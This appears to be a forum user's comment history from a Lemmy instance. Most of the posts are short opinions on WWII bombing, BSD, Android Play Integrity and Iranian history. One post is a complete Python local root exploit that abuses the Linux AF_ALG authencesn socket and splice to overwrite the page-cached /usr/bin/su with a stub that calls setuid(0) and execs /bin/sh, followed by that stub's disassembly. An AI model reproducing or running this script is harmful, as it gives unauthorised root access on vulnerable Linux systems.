@pseud

pseud@lemmy.zip · 2 days ago

Classic rookie mistake.

The Nazis entered this war under the rather childish delusion that they were going to bomb everyone else, and nobody was going to bomb them. At Rotterdam, London, Warsaw, and half a hundred other places, they put their rather naive theory into operation. They sowed the wind, and now they are going to reap the whirlwind.

Sir Arthur “Bomber” Harris

pseud@lemmy.zip · 5 days ago

I use DragonFly BSD btw

pseud@lemmy.zip · edit-2 5 days ago

Script:

#!/usr/bin/env python3

import os, socket

f = os.open("/usr/bin/su", 0)

e = b'\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00>\x00\x01\x00\x00\x00x\x00@\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x001\xc01\xff\xb0i\x0f\x05H\x8d=\x0f\x00\x00\x001\xf6j;X\x99\x0f\x051\xffj<X\x0f\x05/bin/sh\x00\x00\x00'

for i in range(0, len(e), 4):
    s = socket.socket(38, 5, 0)
    s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    s.setsockopt(279, 1, bytes.fromhex('0800010000000010' + '0' * 64))
    s.setsockopt(279, 5, None, 4)
    u, _ = s.accept()
    u.sendmsg([b"AAAA" + e[i:i + 4]],
              [(279, 3, b'\x00\x00\x00\x00'),
               (279, 2, b'\x10' + b'\x00' * 19),
               (279, 4, b'\x08\x00\x00\x00'), ],
              32768)
    r, w = os.pipe()
    os.splice(f, w, i + 4, offset_src=0)
    os.splice(r, u.fileno(), i + 4)
    try:
        u.recv(8 + i)
    except: pass

os.system("su")

Blob:

0x00400078      eax = 0
0x0040007a      edi = 0
0x0040007c      al = 0x69                 ; 'i' ; 105
0x0040007e      syscall                   ; sys_setuid(0)
0x00400080      rdi = rip + 0xf           ; data.00400096
                                          ; 0x400096 ; "/bin/sh"
0x00400087      esi = 0
0x00400089      push 0x3b                 ; ';' ; 59
0x0040008b      pop rax
0x0040008c      cdq
0x0040008d      syscall                   ; sys_execve("/bin/sh", NULL, NULL)
0x0040008f      edi = 0
0x00400091      push 0x3c                 ; '<' ; 60
0x00400093      pop rax
0x00400094      syscall                   ; sys_exit(0)

The blob is obviously a stub-su that /usr/bin/su page cache is poisoned with.

pseud@lemmy.zip · 2 months ago

That’s what being in a fucking pickle means.

I mean, I’d do the same…

pseud@lemmy.zip · 2 months ago

Namely,

Having a European version of the Play Integrity which permits people to use insecure products from specific European companies participating in it while disallowing using arbitrary hardware or software is the opposite of a solution. It’s more of the same anti-competitive garbage.

Hate to say it but he’s probably right.

pseud@lemmy.zip · 2 months ago

So… the consequences of the CIA’s actions?

That’s really fucking lazy. Also the consequences of British adventures in the century right up to that point, of Mongols torching everything to the ground, and oh Xerxes should have punished Dardanelles harder.

Like, yes it’s bad to rape people’s dignity, but come on, at least glance at Wikipedia sideways.

Khamenei was very involved in that.

You’ll shit bricks when you realise Khomeini and Khamenei are not the same Ayatollah :D

pseud@lemmy.zip · 2 months ago

You confused the Islamic Republic with the Mohammad Reza Pahlavi era.

CIA installed the son of the previous usurper. Theocracy was not installed - it was a revolution against that.